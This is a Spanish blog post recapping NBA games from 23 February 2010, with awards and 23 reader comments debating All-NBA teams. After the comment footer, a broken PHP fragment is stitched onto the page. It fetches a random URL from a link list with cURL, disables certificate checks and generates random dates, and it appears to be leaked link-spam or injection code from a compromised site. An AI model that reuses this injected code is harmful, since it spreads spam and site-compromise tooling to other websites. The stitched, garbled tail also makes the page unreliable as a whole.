La Crónica (23/02/2010)

24 de February de 2010 por txusma

Volvió La Mamba y con él el espectáculo. Lakers y Grizzlies protagonizaron un frenético duelo en el FedExForum. Los locales, de la mano de Zach y Mayo tocaron durante un buen rato la victoria con los dedos pero la picadura de Kobe fue tan letal como en las mejores tardes y lanzó la remontada a base de triples y canastas geniales en el último cuarto, de una eficacia demoledora. A falta de 4.3 anotó la definitiva, culminando una excepcional jugada salida directamente de la pizarra de Phil Jackson. Conviene recordar que en la última ocasión que se habían visto las caras los dos equipos fue Artest quien falló el triple de la victoria. Quien piense que Kobe tiene perdido el MVP este año es que no lo ha meditado del todo bien.

El otro nombre en liza es el de Kevin Durant. 29 jornadas consecutivas anotando más de 25 puntos que se dice pronto. Anoche, sin embargo, no sirvieron para alargar la impresionante racha de victorias de su equipo. Como los Grizzlies, tuvieron la victoria en su mano frente unos Suns en los que no jugaba Nash. Un 2+1 de Stoudamire y una genial bomba de Jason Richardson obraron el milagro. Victoria importantísima para el equipo de Arizona.

Por su parte LeBron recuperó la senda de la victoria contra los Hornets. Shaq-Jamison y LeBron mostraron sus credenciales como uno de los mejores frontcourts de la competición imponiéndose a Okafor-West-Stojakovic. Collison y Thornton volvieron el partido bastante loco, pero no fue suficiente para infringir la 4ª consecutiva a los Cavaliers.

Otro foco de interés anoche venía de Boston. Allí Sergio dio un recital poniendo en jaque a los mismísimos Celtics. Estos lograron imponer su mejor plantilla, pero pierden a Pierce indefinidamente. Pintan bastos en la casa del trébol.

Si hablábais ayer del gafe de Washington con la lesión de Howard, no sabría calificar lo de los Blazers. Lesión de Camby a los 5 minutos de partido y desbarajuste total en las posiciones de alero. Tras 60 partidos McMillan no tiene claro quien es su 3 titular. Batum, Webster y Rudy están completamente desquiciados. El mayor perjudicado en todo este asunto, para mí, Webster… y el propio equipo de los Blazers, por supuesto. No todos los rivales son los Nets de anoche y necesitará lo mejor de sus hombres para seguir vivos en postemporada.

Terminando, los Heat sin Wade no ganan ni a los Wolves. Los Pistons le dieron repasillo a los Kings y los Sixers a los Warriors.

PREMIOS

MVP: Kobe Bryant parece haber vuelto el plenitud de facultades tras su breve descanso. 32 puntos, 7 rebotes, 6 asistencias, 3 robos, 2 tapones y un triple ganador a falta de 4 segundos lo atestiguan. En Phoenix, Amare Stoudamire se vistió de líder ante la baja de Steve Nash y lideró a los suyos con 30 puntos y 9 rebotes. Y Philadelphia consiguió la victoria frente los Warriors en parte gracias al casi triple de Louis Williams (26 puntos, 10 rebotes y 7 asistencias)

Rookie: Jrue Holiday cuajó una gran actuación anoche aprovechando que los Sixers se enfrentaban a los “inflanúmeros” de los Warriors con 15 puntos y 6 asistencias. Y vaya parejita que se han encontrado en New Orleans. Marcus Thorton se fue a los 37 puntos y Darren Collison anotó 22 puntos y repartió 10 asistencias. Como novatos tienen muchos puntos que pulir pero hay futuro. Los que són más presente que futuro son Tyreke Evans, 28 puntos y 13 asistencias frente los Pistons, y Stephen Curry, 17 puntos, 6 rebotes y 5 asistencias frente los Sixers.

Sorpresa: Sin Wade, Miami es un equipo de la zona media-baja en el que cualquier jugador puede tener un partido bueno. Ayer le tocó a Dorrell Wright, autor de 26 puntos (9 de 11) y 7 rebotes. En New York, primer partido bueno de Sergio Rodríguez: 18 puntos, 5 rebotes y 6 asistencias. Y ante la baja de Steve Nash, Goran Dragic se medio disfrazó del canadiense anotando 16 puntos y repartiendo 10 asistencias.

Decepción: Ahora que ha vuelto Kobe Bryant alguien debería decir a Ron Artest que no hace falta que se casque ni 9 tiros. Y menos si sólo va anotar 1 de ellos.

Esfuerzo en vano: El de un veterano de estas lides, David Lee, 28 puntos y 15 rebotes. Devin Harris y Courtney Lee también anotaron 28 insuficientes puntos cada uno en la derrota de los Nets frente los Blazers. Kevin Durant se fue a los 36 puntos y 8 rebotes pero ni con esas consiguieron ganar a los Suns. Y finalmente recordar que Tyreke Evans perdió frente los Pistons, así que también tiene sitio en este apartado.

Comenta

23 comentarios a esta entrada

  1. Rompe dice:
    #1

    Ron Ron no está siendo ni la mitad de lo que prometía…

      Citar

  2. Txusma dice:
    #2

    De hecho para lo que está haciendo, los Lakers podrían haber fichado cualquier otro especialista defensivo sin ánimos de estrella. Pero bueno, Ariza en los Rockets tampoco es que se esté saliendo (hablando de tios que se creen estrellas). Esperemos a los Playoffs que a lo mejor es cuando el bueno de Artest se crece.

      Citar

  3. TheDeerHunter dice:
    #3

    No lo creo en absoluto.
    En mi opinión Artest está dando lo que se le pide y es mucho. El problema es que lo que se le pide no sale en las estadísticas.
    El nivel defensivo del equipo es el mejor desde que llegó Pau al equipo… no es casualidad.

    En cualquier caso coincido en que en playoffs crecerá en importancia.

      Citar

  4. Marcaco dice:
    #4

    Artestito nos hara unos wenos playoffs defendiendo a aleros claves y tb sera clave en las finales defendiendo a Jamison/Lebron .

    P.D: con esto no solo doy por hecho q Boston no estara en la final sino auguro que si llegan a segunda ronda sera ya como un anillo para ellos.

      Citar

  5. sayim dice:
    #5

    Ahora mismo parece que los Celtics están muy mal, pero llegaron a ser el equipo con más anillos de su historia gracias, en gran parte, a su orgullo y humildad. No serán fáciles de ganar. También parecía que el año pasado no tenían ninguna opción y los magic los eliminaron en el séptimo partido. El big three darán lo mejor de si mismos en PO, sabiendo que probablemente sea su última oportunidad de anillo y Rondo ha crecido mucho. Evidentemente no son favoritos para llegar a las finales, pero yo no los descartaría tan rápìdo.

      Citar

  6. pcerezo dice:
    #6

    Kevin Durant quinteto inicial del año?

    Pablo

      Citar

  7. sayim dice:
    #7

    Puede que este entre Durant y Carmelo, ya que Lebron tiene plaza segura como alero… Para mi Durant entraria seguro, es mas, ahora mismo, en mi opinion, esta entre los tres mejores jugadores de la liga

      Citar

  8. Txusma dice:
    #8

    Elegir entre Durant y Carmelo… que difícil! Supongo que las posiciones de base/escolta serán para Wade y Kobe y la de Center para Howard. Ahora que lo veo… puede encaramarse Pau al segundo quinteto por encima de gente como Duncan, Nowitzki, Amare o Chris Bosh? Teniendo en cuenta q la otra posición como F será para Durant o Melo (el que no entre en el primero) estos 5 parece que se jugarán la otra posición.

      Citar

  9. sayim dice:
    #9

    Yo creo q se la daran a Chris Bosh, aunque para mi sea el que menos se lo merece desues de Amare….

      Citar

  10. Viva_Dirk dice:
    #10

    Wade para el primer quinteto? Para mi la temporada de Wade es algo decepcionante, pondria a Nash por encima suyo sin duda. Nash-Kobe-Melo-Lebron-Howard, aunque siendo algo mas puristas yo diria: Nash-Kobe-Lebron-Duncan-Howard, ya que espero un gran final de regular season de Howard.

      Citar

  11. Rompe dice:
    #11

    Para mi Durant está siendo mejor que Melo. Prácticamente en todas las victorias de los Thunder Durant ha estado a un nivel superlativo, mientras que los Nuggets se las han apañado muy bien con la lesión de su estrella. De todas maneras, como bien dicen por ahí, la temporada de Wade no está siendo igual que la del año pasado, por ejemplo, y no estaría mal un quinteto ideal Kobe-Lebron-Melo-Durant-Howard, que Kobe de base y Lebron de escolta, si los pones, no desentonan jeje.

      Citar

  12. Txusma dice:
    #12

    Pues yo creo que aún a un nivel inferior al de la temporada pasada (simplemente monstruosa) Wade sigue estando por encima de Nash. Si Miami no se clasifica para Playoffs y Phoenix sí entonces la cosa podría cambiar pero a igualdad de condiciones…

      Citar

  13. Viva_Dirk dice:
    #13

    Nash esta en los números de cuando fue MVP.

      Citar

  14. Txusma dice:
    #14

    Me parece perfecto… pero ese no es argumento que demuestre que está por encima de Wade.

      Citar

  15. TheDeerHunter dice:
    #15

    Lo que no se sostiene es que Wade es mejor PG que Nash.
    Ojo… que no critico el debate, ni a vosotros, critico el tono que está cogiendo aquello del quinteto ideal de la temporada.

    Un día debería ser rollo: Wade-Kobe-Paul-Deron-Durant… o Bynum-Pau-Nowitzki-Duncan-Stoudamire… y terminamos de vomitar encima de este galardón.

      Citar

  16. sayim dice:
    #16

    Además de que con Nash, queda un quinteto más “purista” como lo denominó Viva_Dirk, yo creo que la temporada de Miami es un poco decepcionante y como terminen fuera de PO (a dia de hoy no es nada descabellado) en la coña de la conferencia este no creo q Wade se merezca el premio individual de estar en el primer quinteto. De hecho, no me vienen muchos nombres a la cabeza de jugadores que ultimamente entraran en el primer quinteto sin meter a su equipo en post temporada. Y además creo que es justo que así sea

      Citar

  17. Txusma dice:
    #17

    Ei, que estoy de acuerdo en que Nash es mejor base que Wade de aquí a lima y que con Nash el quinteto queda más purista, aunque aún más purista, como dice Viva, queda con Duncan que con Durant. Que la NBA divida de una vez a los jugadores en 5 categorías para esta clase de premios y ya está. Habría que elegir al mejor PF y Durant, Carmelo o Lebron se irían al tercer quinteto. Justo?

      Citar

  18. TheDeerHunter dice:
    #18

    ¿Qué es un quinteto en baloncesto?

      Citar

  19. Txusma dice:
    #19

    5 tios en calzoncillo largo? XD

      Citar

  20. TheDeerHunter dice:
    #20

    cuento con que ese comentario me sirva de jurisprudencia cuando en la TJ league alinee a los primeros 5 tipos que me salgan del bolo.

      Citar

  21. Txusma dice:
    #21

    No te lo tomes tan en serio, hombre…
    Está claro que si hablamos de un quinteto en baloncesto deberíamos elegir a los jugadores tan solo en las posiciones que pueden ocupar. Nash no debería poder ser elegido como escolta, por lo que no debería tener sentido un quinteto con Paul y Nash. Y de la misma manera ni Carmelo ni Lebron deberían poder ser elegidos como PF, así que los 2 juntos jamás coincidirían en el mejor quinteto. La pregunta es si este quinteto tan estricto nos deja una visión real de los mejores jugadores de la temporada…

      Citar

  22. TheDeerHunter dice:
    #22

    olvidé poner el XD ¿entonces no me sirve como jurisprudencia? XD

    Entiendo lo que dices… y es cierto. Pero creo que entonces habría que eliminar la palabra quinteto del galardón, o hacer un premio que se llamar los 5 fantabulosos de la temporada o algo así.

    Si Bill Russell sólo pudo estar 3 veces en el mejor quinteto de la liga me parece perfectamente justificable que esté en el 2º y el 3º Durant o Melo.

    Y el que un jugador en las últimas posiciones de playoff se meta en uno de estos quintetos me parece, en líneas generales, un completo despropósito.

      Citar

  23. kantonyo dice:
    #23

    Estoy con vosotros, el quinteto títular debe ser el mejor en cada posición, y con las excepciones de jugadores que puedan jugar en varias, como muchos PF que pueden jugar de C por ejemplo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>